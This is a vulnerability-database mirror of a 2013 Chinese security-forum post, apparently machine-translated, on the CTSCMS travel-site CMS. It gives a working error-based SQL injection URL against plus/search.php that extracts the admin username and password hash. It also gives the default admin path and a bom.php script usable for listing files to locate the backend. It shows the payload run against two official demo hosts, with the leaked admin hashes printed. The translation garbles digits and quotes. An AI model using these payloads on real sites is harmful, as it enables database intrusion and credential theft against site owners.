Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201338596
HistoryMay 04, 2013 - 12:00 a.m.

CTSCMS the latest vulnerability-vulnerability warning-the black bar safety net

2013-05-0400:00:00
佚名
www.myhack58.com
7
JSON

China travel service website management system(CTSCMS.COM)is a professional tourism website, the program source code, travel website, travel website templates, tourism website construction service providers,focusing on the tourism e-Commerce development services to travel agencies and tour it.

Okay~CTSCMS in fact, is the use of weaving dream template, and then just own the commercial version to actually there a 5 0 0 ocean going purchase

See the update date

data/admin/ver.txt

Are generally 2 0 1 0 years, perhaps can also directly getshell

exp:

http://www.0day5.com/plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@"+]=a

Default background address is

http://www.0day5.com/ctscms

Can’t find the background also better, in the view source of the time to find an interesting stuff

bom.php

<? php

//remove the utf-8 boms

//by magicbug at gmail dot com

if (isset($_GET[‘dir’])){ //config the basedir

$basedir=$_GET[‘dir’];

}else{

$basedir = ‘.’;

}

$auto = 1;

checkdir($basedir);

function checkdir($basedir){

if ($dh = opendir($basedir)) {

while (($file = readdir($dh)) !== false) {

if ($file != ‘.’ && $file != ‘…’){

if (! is_dir($basedir.“/”.$ file)) {

echo "filename: $basedir/$file ";

echo checkBOM(“$basedir/$file”)." <br>";

}else{

$dirname = $basedir.“/”.$ file;

checkdir($dirname);

}

}

}

closedir($dh);

}

}

function checkBOM ($filename) {

global $auto;

$contents = file_get_contents($filename);

$charset[1] = substr($contents, 0, 1);

$charset[2] = substr($contents, 1, 1);

$charset[3] = substr($contents, 2, 1);

if (ord($charset[1]) == 2 3 9 && ord($charset[2]) == 1 8 7 && ord($charset[3]) == 1 9 1) {

if ($auto == 1) {

$rest = substr($contents, 3);

rewrite ($filename, $rest);

return (“<font color=red>BOM found, automatically removed.& lt;/font>”);

} else {

return (“<font color=red>BOM found.& lt;/font>”);

}

}

else return (“BOM Not Found.”);

}

function rewrite ($filename, $data) {

$filenum = fopen($filename, “w”);

flock($filenum, LOCK_EX);

fwrite($filenum, $data);

fclose($filenum);

}

?& gt;

You can list all the files, Hey Hey~then you know, can’t find the time real-time

http://www.0day5.com/bom.php

! [](/Article/UploadPic/2013-5/2 0 1 3 5 4 1 4 4 8 1 5 6 5 8 9 8. png)

The background will directly find sys_safe. php can find the background.

The official demo version:

http://c.ctscms.com/plus/search.php?keyword=as&amp;typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@"+]=a

Error infos: Duplicate entry ‘1|ctscms|d7f10e7cca0693eb8561’ for key ‘group_key’

http://s.ctscms.com/plus/search.php?keyword=as&amp;typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@"+]=a

Error infos: Duplicate entry ‘1|ctscms|c6364c485d55bb9df83a’ for key ‘group_key’

Background to take the shell does not interpret the~

JSON